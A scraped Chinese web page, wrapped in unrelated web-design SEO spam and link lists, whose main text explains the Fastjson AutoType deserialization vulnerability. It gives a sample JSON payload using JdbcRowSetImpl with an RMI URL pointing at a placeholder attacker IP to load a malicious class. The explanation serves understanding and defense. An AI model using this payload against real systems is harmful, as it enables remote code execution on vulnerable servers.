当前位置: 首页 > news >正文

东莞做网站公司首选公司申请域名

东莞做网站公司首选,公司申请域名,网站开发主菜单和子菜单,进入qq空间登录fastjson漏洞 fastjson工作原理攻击原理补充 例子 fastjson工作原理 fastjson的作用是将JAVA对象转换成对应的json表示形式#xff0c;也可以反过来将json转化为对应的Java对象。fastjson使用AutoType功能进行反序列化#xff0c;AutoType使用type标记字符的原始类型#x… fastjson漏洞 fastjson工作原理攻击原理补充 例子 fastjson工作原理 fastjson的作用是将JAVA对象转换成对应的json表示形式也可以反过来将json转化为对应的Java对象。fastjson使用AutoType功能进行反序列化AutoType使用type标记字符的原始类型在反序列话时会读取type以此把内容反序列化到对象在上述过程中会调用到库中的setter和getter方法 攻击原理 攻击者传入一个恶意构造的json内容程序对其反序列话后得到恶意类并执行了恶意类中的恶意函数进而促使恶意代码执行 合理构造一个JSON使用type指定一个想要攻击的类库就可以实现攻击 补充 仅影响Fastjson1.2.24及之前版本 例子 {b: {type: com.sun.rowset.JdbcRowSetImpl,dataSourceName: rmi://攻击者的IP地址/恶意类,autoCommit: true}JSON 数据包这里展示的 JSON 数据包包含一个名为 b 的对象其中有一个 type 字段指定了这个对象的类型为 com.sun.rowset.JdbcRowSetImpl。这是一种 Java 对象类型。恶意数据在 dataSourceName 字段中提供了一个远程方法调用 (RMI) 的 URL指向攻击者的 IP 地址和他们控制的恶意类。这意味着 Fastjson 会尝试从这个远程地址加载并执行恶意类。自动提交autoCommit 字段被设置为 true表明在反序列化后自动执行某些操作。
http://www.w-s-a.com/news/228927/

相关文章:

  • 电子商务网站建设期末试题08答案互联网怎么做
  • 规范门户网站的建设和管理办法微信网站开发公司电话
  • 免费行情网站凡客的官网
  • 做网站运营的女生多吗海淀企业网站建设
  • 网站运行环境配置网站建设个一般需要花费多少钱
  • 广西平台网站建设报价wordpress 免费 企业 主题
  • 四川省建设厅职称查询网站辽宁省住房和城乡建设部网站
  • 公司网站后台登陆网站放到云服务器上怎么做
  • 济南 网站定制做网站购买域名
  • 代理分佣后台网站开发怎么用源码做网站视频
  • 天津网站建设招标wordpress七牛图片插件
  • 建设合同施工合同示范文本汕头市网络优化推广平台
  • 网站关键词修改老王搜索引擎入口
  • 那个网站做搬家推广比较好建设部网站办事大厅栏目
  • 做企业销售分析的网站广州网站设计建设
  • 建站流程wordpress怎么开伪静态
  • 服务器不是自己的做违法网站videopro wordpress
  • 北京建网站的公司哪个比较好网站开通告知书
  • 网站负责人 主体负责人黑龙江 建设监理协会网站
  • 手机网站焦点图代码建设工程质量检测网站
  • 墙绘做网站推广有作用没html网页制作用什么软件
  • 企业做网站有用吗网站推广的常用方法有哪些?
  • 景安做网站教程互联网小程序开发
  • 桂林北站离阳朔多远贵州省建设厅住房和城乡建设官网二建考试
  • 浙江省建设厅 网站是多少wordpress淘宝客一键
  • 网站流量少怎么做5个不好的网站
  • 随州网站建设有限公司个人申请注册公司需要多少钱
  • 东莞做商城网站建设wordpress批量下载外链图片
  • 新网站建设运营年计划书仓山区建设局招标网站
  • 网站开发天津网站建设项目组织图